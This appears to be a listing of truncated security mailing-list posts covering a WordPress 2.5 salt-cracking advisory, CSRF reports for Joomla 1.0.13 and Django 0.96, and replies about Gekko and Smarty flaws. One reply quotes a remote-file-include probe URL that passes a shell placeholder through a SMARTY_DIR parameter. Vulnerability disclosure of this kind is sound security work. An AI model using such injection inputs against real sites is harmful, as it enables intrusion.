WordPress 2.5 - Salt cracking vulnerability

WORDPRESS 2.5 - SALT CRACKING VULNERABILITY --- http://xiam.menteslibres.org/pages/advisories/wordpress-2-5-salt-cracking-vulnerability By J. Carlos Nieto <[EMAIL PROTECTED]> http://xiam.menteslibres.org Severity Medi

Re: Joomla 1.0.13 CSRF

J. Carlos Nieto wrote: There exists a Cross Site Scripting security hole in Joomla 1.0.13. Sorry, it should be "Cross Site Request Forgery".

Joomla 1.0.13 CSRF

Author: Jose Carlos Nieto. Date: Jan 08, 2008 Severity: Mild There exists a Cross Site Scripting security hole in Joomla 1.0.13. Background == *Joomla!* is a free , open source content ma

Re: Gekko <=0.8.2 (temp directory) Path Disclosure

Hi. You forgot to mention that this happens only when Gekko is not installed under Apache server. The file temp/.htaccess contains the following lines: Order Allow,Deny Deny from all So if you try to get any file under the "temp" directory it will trow you a 403 error. If you are using A

Django 0.96 (stable) Admin Panel CSRF

Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background == Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that all

Re: Smarty-2.6.1 Remote File Include Vulnerabilities

On Mon, 2006-10-23 at 16:30 +, [EMAIL PROTECTED] > > require_once './config.php'; > require_once SMARTY_DIR . 'Smarty.class.php'; > require_once 'PHPUnit.php'; SMARTY_DIR is a constant, isn't it? > > > http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll? > But